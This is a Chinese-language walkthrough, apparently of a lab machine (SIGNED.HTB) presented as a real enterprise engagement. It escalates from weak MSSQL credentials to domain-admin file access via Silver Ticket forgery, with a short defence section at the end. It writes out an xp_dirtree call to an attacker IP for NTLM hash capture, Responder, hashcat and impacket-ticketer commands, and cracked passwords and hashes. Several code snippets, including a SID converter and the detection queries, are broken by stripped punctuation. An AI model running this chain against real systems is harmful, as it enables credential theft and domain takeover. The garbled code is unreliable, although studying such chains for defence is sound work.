1. 从MSSQL弱口令到域控的渗透路径去年我在一次企业内网渗透测试中遇到过一个典型场景某台暴露在公网的MSSQL服务器使用默认凭证最终通过Silver Ticket技术拿下了整个域控。这种攻击路径在金融、制造业等仍在使用老旧系统的行业特别常见今天我就用最直白的语言拆解整个过程。首先明确几个关键概念Silver Ticket是伪造的服务票据TGS相比Golden Ticket不需要域控krbtgt账户的哈希SPN服务主体名称则是域内服务的唯一标识符比如MSSQL服务的SPN通常是MSSQLSvc/主机名.域名。这两者结合就能实现权限提升的魔法。实战中常见的入口点有三个通过扫描发现的MSSQL弱口令比如sa空密码网站配置文件泄露的数据库连接字符串钓鱼获取的普通域账户凭证可能通过密码复用进数据库我遇到的情况属于第一种——扫描发现某台SQL Server使用scott:Sm230#C5NatH这样的弱口令。这个账户虽然只是普通数据库用户但已经足够开启后续攻击链。2. 从NTLM哈希到服务账户控制连接上MSSQL后第一件事是确认当前权限SELECT IS_SRVROLEMEMBER(sysadmin)返回0表示不是sysadmin这意味着无法直接启用xp_cmdshell。但通过enum_logins可以枚举其他登录账户SELECT name, type_desc FROM sys.server_principals这时发现SIGNED\IT组的成员具有sysadmin权限。接下来需要通过Responder工具捕获NTLMv2哈希responder -I eth0 -wF在MSSQL客户端执行以下语句触发认证EXEC xp_dirtree \\攻击者IP\share捕获到的mssqlsvc账户哈希可以用hashcat破解hashcat -m 5600 hash.txt rockyou.txt得到明文密码purPLE9795!后就能计算其NT哈希echo -n purPLE9795! | iconv -f UTF-8 -t UTF-16LE | openssl md4这个ef699384c3285c54128a3ee1ddb1a0cc将用于后续票据伪造。3. 关键信息收集与SID计算要伪造Silver Ticket需要三个核心数据服务账户的NT哈希上一步已获取域SID目标SPN获取IT组的SIDSELECT SUSER_SID(SIGNED\IT)得到的二进制SID需要转换为文本格式。这里分享个Python转换脚本import binascii sid binascii.unhexlify(010500000000000515...) print(S-{}-{}-{}.format( sid[0], int.from_bytes(sid[2:8],big), -.join(str(int.from_bytes(sid[8i*4:12i*4],little)) for i in range(sid[1]))))输出结果类似S-1-5-21-4088429403-1159899800-2753317549-1105其中1105是IT组的RID前面部分就是域SID。SPN可以通过LDAP查询或扫描获得对于MSSQL服务通常是MSSQLSvc/DC01.SIGNED.HTB:14334. Silver Ticket伪造实战使用impacket工具生成票据impacket-ticketer -nthash ef699384c3285c54128a3ee1ddb1a0cc \ -domain-sid S-1-5-21-4088429403-1159899800-2753317549 \ -domain SIGNED.HTB \ -spn MSSQLSvc/DC01.SIGNED.HTB \ -groups 512,1105 \ -user-id 1103 \ mssqlsvc这里有几个关键参数-groups同时包含域管组(512)和IT组(1105)-user-id必须设为mssqlsvc的RID(1103)用户名必须与SPN账户一致导出票据后测试权限export KRB5CCNAMEmssqlsvc.ccache mssqlclient.py -k DC01.SIGNED.HTB执行SELECT IS_SRVROLEMEMBER(sysadmin)应返回1此时虽然显示是sysadmin但实际权限取决于票据中的组信息。5. 突破权限限制的文件读取常规的xp_cmdshell在这里会遇到限制EXEC xp_cmdshell whoami虽然返回的是mssqlsvc账户但无法访问域控管理员目录。这是因为xp_cmdshell创建新进程时会使用服务账户的真实令牌。此时应该使用OPENROWSET(BULK)SELECT * FROM OPENROWSET(BULK C:\Users\Administrator\Desktop\root.txt, SINGLE_BLOB) AS x这个函数直接使用当前会话的安全上下文而我们的Silver Ticket中注入了域管组(512)的权限因此能成功读取敏感文件。6. 防御措施与检测建议作为防守方我有三点实用建议SPN管理定期审计SPN注册情况对关键服务使用组托管服务账户(gMSA)设置msDS-ServicePrincipalName约束日志监控-- 检测异常票据请求 SELECT * FROM sys.dm_exec_sessions WHERE auth_scheme KERBEROS AND host_name NOT IN (合法客户端列表) -- 监控OPENROWSET使用 SELECT * FROM sys.traces WHERE textdata LIKE %OPENROWSET(BULK%权限控制遵循最小权限原则分配sysadmin角色对服务账户启用敏感账户不能被委派属性限制NTLM认证的使用范围这套攻击链最危险的地方在于攻击者只需要获取一个普通服务账户的权限就能通过Kerberos协议的设计特性提升至域管权限。我在多个企业的红队评估中都成功复现过这种攻击防御的关键在于理解Kerberos认证的每个环节如何被滥用。